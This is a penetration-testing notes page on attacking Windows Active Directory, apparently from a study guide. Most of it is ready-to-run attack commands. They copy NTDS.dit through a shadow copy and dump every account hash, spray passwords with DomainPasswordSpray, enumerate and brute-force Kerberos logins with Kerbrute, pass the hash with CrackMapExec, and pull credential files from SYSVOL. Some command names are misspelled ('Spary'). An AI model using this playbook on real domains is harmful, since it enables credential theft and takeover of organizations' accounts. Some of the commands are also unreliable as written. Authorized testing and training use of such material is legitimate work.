reg SAVE HKLM\SYSTEM c:\temp\sys

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

ESENTUTL /p c:\temp\dit /!1024 /8 /o

$key=Get-BootKey -SystemHiveFilePath c:\temp\sys

Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

Password spraying Active Directory

GitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!GitHub

Import-Module c:\tools\DomainPasswordSpary.ps1

Invoke-DomainPasswordSpary -Password kitty-kat

Invoke-DomainPasswordSpary -PasswordList c:\tools\adpass.txt

Kerberos brute-forcing attacks

Kerbrute

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Username Enumeration

./kerbrute userenum -d cybex.com --dc <domain IP> <username list>

Password Attack

./kerbrute passwordspary -d cybex.com --dc <domain IP> <password-list> <password>

CrackMapExec to access and enumerate AD

crackmapexec smb <ip/cidr>

Pass The Hash Attack

crackmapexec smb <domain IP> -u "<username>" -H "<password hash>"

crackmapexec smb <domain IP> -u "username" -p <password.txt>

Unsecured Credentials: Group Policy Preferences, Sub-technique T1552.006 - Enterprise | MITRE ATT&CK®attack.mitre.org

smbclient \\\\<Domain IP address>\\sysvol -U <username>

Retrieve a File

smb> get <file name or file location>

Take advantage of legacy data

Jxplorer

Open Jxplorer
Enter username and password
Select a user
Select Table Editor Column at the right hand side
Decode the Info value (base64 encoded)

Decode Base64 value

echo "<base64 encoded text>" | base64 -d

PreviousIntroduction to Identities NextAdvanced Penetration Testing

Last updated 2 years ago

hashtagTools

hashtagLoad DSInternals using Powershell

hashtagInstall Impacket in Linux

hashtagInstall BloodHound in Linux

hashtagInstall Kerbrute

hashtagInstall Crackmapexec

hashtagExtract the AD hashes

hashtagPassword spraying Active Directory

hashtagKerberos brute-forcing attacks

hashtagKerbrute

hashtagUsername Enumeration

hashtagPassword Attack

hashtagCrackMapExec to access and enumerate AD

hashtagPass The Hash Attack

hashtagInvestigate the SYSVOL share

hashtagRetrieve a File

hashtagTake advantage of legacy data

hashtagJxplorer

hashtagDecode Base64 value

Tools

Load DSInternals using Powershell

Install Impacket in Linux

Install BloodHound in Linux

Install Kerbrute

Install Crackmapexec

Extract the AD hashes

Password spraying Active Directory

Kerberos brute-forcing attacks

Kerbrute

Username Enumeration

Password Attack

CrackMapExec to access and enumerate AD

Pass The Hash Attack

Investigate the SYSVOL share

Retrieve a File

Take advantage of legacy data

Jxplorer

Decode Base64 value